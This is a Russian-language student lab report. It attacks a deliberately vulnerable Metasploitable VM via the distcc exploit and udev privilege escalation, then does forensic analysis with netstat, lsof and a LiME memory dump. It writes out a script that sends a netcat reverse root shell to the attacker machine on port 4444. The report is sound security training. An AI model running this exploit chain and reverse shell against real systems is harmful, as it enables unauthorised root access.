ХОД РАБОТЫ

1.1. Создание виртуальной машины Kali Linux

1) Была создана виртуальная машина Kali Linux со следующей конфигурацией: тип системы – Debian, архитектура процессора – x64, количество процессоров – 1, объем ОЗУ – 512 МВ, размер жесткого диска – 16 GB, тип сетевого подключения – сетевой мост.

1.2. Настройка сети между Metasploitable и Kali Linux.

1) Были записаны ІР обоих виртуальных машин

1.3. Aтака Metasploitable.

1.3.1. Сканирование портов Metasploitable с помощью NMAP.

1) Было запущено сканирование открытых портов (от 1 до 65535) виртуальной машины Metasploitable следующей командой nmap -p 1-65535 -T4 -A –v MS_IP 2>&1 | tee /var/tmp/scan.txt Также проведена проверка того, что distcc запустился на нужном порту

1.3.2. Запуск эксплоита distcc используя Metasploit.

- 1) Сначала был запущен Metaspoit для атаки на систему
- 2) Был выполнен поиск distcc эксплоита командой search distcc;
- 3) Запуск эксплоита: use exploit/unix/misc/distcc exec.

1.3.3. Выбор и настройка дополнительного загрузчика для эксплоита distcc.

1) Был выбран загрузчик эксплоитов bind_ruby для атаки, просмотрены его опции и установлен IP жертвы

1.3.4. Получение доступа к Metasploitable.

1) Был получен доступ к удаленной машине командой exploit;

1.4. Расширение прав доступа до root.

1.4.1. Скачивание эксплоита exploit-8572.

1) Был скачан и скомпилирован эксплоит, после чего произведена проверка на существование файла

1.4.2. Создание netcat сессии для удаленного управления.

1) Было выполнено создание netcat сессии, прослушивающее порт 4444. Netcat — утилита Unix, позволяющая устанавливать соединения TCP и UDP, принимать оттуда данные и передавать их.

1.4.3. Использование exploit-8572 для предоставления удаленной консоли с правами root по netcat.

1) Был создание скрипт, для запуска на на нашей жертве echo '#!/bin/sh' > /tmp/run;

echo '/bin/netcat -e /bin/sh KL IP 4444' >> /tmp/run;

2) определен pid менеджера устройств, после чего из полученного pid вычтена единица для имитации pid родительского процесса

В результате выполнения эксплоита менеджер устройств udev создал блочное устройство с правами root, которое в свою очередь выполнят скрипт /tmp/run. В результате выполнения скрипта для удаленной машины KL_IP предоставлена консоль(п. 1.4.2.) через netcat на порту 4444 с правами root, которую можно будет опробовать выполнив команды whoami и др.

1.5. Форензика.

1.5.1. Выявление аномальной активности. Привязывание сетевых подключений к идентификаторам процессов.

1) выполните команду netstat –noap | less;

В разделе tcp соединений были просмотрены прослушивающиеся и установленные соединения на данный момент. В тоже время у нас были и неизвестные соединения с ір адреса 192.168.0.101, использующие порт 4444, который по умолчанию используются для проксирования HTTP трафика. За первое соединение отвечает процесс 5288 на котором выполняется shell (далее SH_PID). За второй процесс 5267 на котором выполняется ruby (далее RUBY_PID). Для облегчения последующего просмотра команды были выведены при помощи команды: netstat –noap | grep 4444.

2) Были выполнены команды:

ps -eaf | grep RUBY PID | grep -v grep;

ps -eaf | grep SH_PID | grep -v grep;

Процесс RUBY_PID выполняет простой скрипт, который вполне читается даже без знания самого языка. На порте 4444 разворачивается tcp-сервер (s=TCPServer.new("4444")). До тех пор пока соединение «s» принимается мы получаем

некоторый сокет «с» (while(c=s.accept)). Из которого постоянно читаем строку с командой «cmd» (while(cmd=c.gets)), после чего пытаемся её

выполнить(IO.popen(cmd,"r")). В теле функции popen происходит передача в сокет «с» вывода команды «cmd».

Процесс SH_PID представляет собой обычный shell, запущенный некоторым родительским процессом с правами root. При просмотре информации о родительском процессе командой:

ps -eaf | grep P_SH_PID | grep -v grep;

, где P_SH_PID – pid родительского процесса SH_PID ,

запускается неким /tmp/run скриптом от init процесса с наивысшими привилегиями.

3) Были просмотрены какие файлы используются netcat сессией на порту 4444 командой:

Isof | grep 4444;

Было обнаружено, что RUBY_PID запущен с правами демона, в то время как SH_PID с правами root.

1.5.2. Анализ демона с процессом RUBY_PID.

1) Выполнение команды Isof –р RUBY_PID;

Помимо библиотек подгружаемых демоном для исполнения скрипта ruby была обнаружена обычная работа сервера distcc, а также необычная активность на порту 4444 идущая от Metasploitable (MS IP) до Kali Linux (KL IP).

1.5.3. Использование Isof для анализа netcat сессии с процессом SH_PID и root правами.

1) выполнена команда lsof –р SH_PID;

Помимо стандартных библиотек используемых shell были обнаружены установленные соединения с правами root, идущие от Metasploitable (MS_IP) до Kali Linux (KL_IP), что является не нормальным.

1.5.4. Использование ps для анализа netcat сессии с процессом SH_PID и root правами.

- 1) Выполнена команда ps -eaf | grep -v grep | grep SH_PID;
- 2) Также выведен результат команды ps -eaf | grep -v grep | grep P_SH_PID;
- 3) командой cat /tmp/run выведено содержимое скрипта предоставившего shell удаленной машине.

На выводе скрипта было обнаружено, что клиент netcat подключился к серверу 192.168.0.101:4444 и предоставил ему /bin/sh.

1.6. Создание дампа памяти с помощью LiME

1.6.1. Подготовка директории.

- 1) Был создан каталог /var/www/distcc командой mkdir –p /var/www/distcc;
- 2) Был сменен владелец, а также были выданы права доступа командой chmod 755 /var/www/distcc

1.6.2. Создание дампа.

- 1) Создан дамп оперативной памяти Metasploitable с помощью команды: insmod ./lime-2.6.24-16-server.ko "path=/var/www/distcc/distcc memory.lime format=lime";
- 1.7. Создание файлов для форензического анализа.
- 1.7.1. Сохранение сведений о системе
- 1) Были сохранены сведения о состоянии сетевых соединений и слушаемых на данном компьютере портах командой netstat -naop > /var/www/distcc/distcc_netstat.txt;
- 2) Сохранен вывод информации о том, какие файлы используются теми или иными процессами в системе командой lsof > /var/www/distcc/distcc_lsof.txt;
- 3) Сохранен отчёт о работающих процессах командой
- 4) Былм заархивированы все данные командой tar zcvf /var/www/distcc/tmp.tar.gz /tmp.

1.7.2. Создание MD5 хеш-суммы.

1) Создание MD5 хеш-сумм командой md5sum * | tee distcc_md5.txt.

РЕЗУЛЬТАТ РАБОТЫ

```
root@metasploitable:~# date
Thu Jun 16 15:00:35 EDT 2022
root@metasploitable:~# echo "Sadritdinov Ural Fidavisovich"
Sadritdinov Ural Fidavisovich
root@metasploitable:~# free -m
              total
                           used
                                       free
                                                 shared
                                                            buffers
                                                                         cached
                                        219
                503
                            283
                                                                 14
                                                                            135
Mem:
                                                      0
-/+ buffers/cache:
                            133
                                        369
Swap:
                  0
                              0
                                          0
root@metasploitable:~# du -sh /var/www/distcc/distcc_memory.lime
513M
        /var/www/distcc/distcc_memory.lime
root@metasploitable:"# cat /var/www/distcc/distcc_md5.txt
229f3715aab50db380e197e947a37533 distcc_lsof.txt
def402ec4eaaf2abec81e8398cb7e39c distcc_memory.lime
da3af7b52a5636f74f98375af070b0ed distcc_netstat.txt
64ee646dba16a9e53fada74aab3e5ce6 distcc_pseaf.txt
21f070fb7fe7bc6d709c1869d9d4f52e tmp.tar.gz
root@metasploitable:~# _
```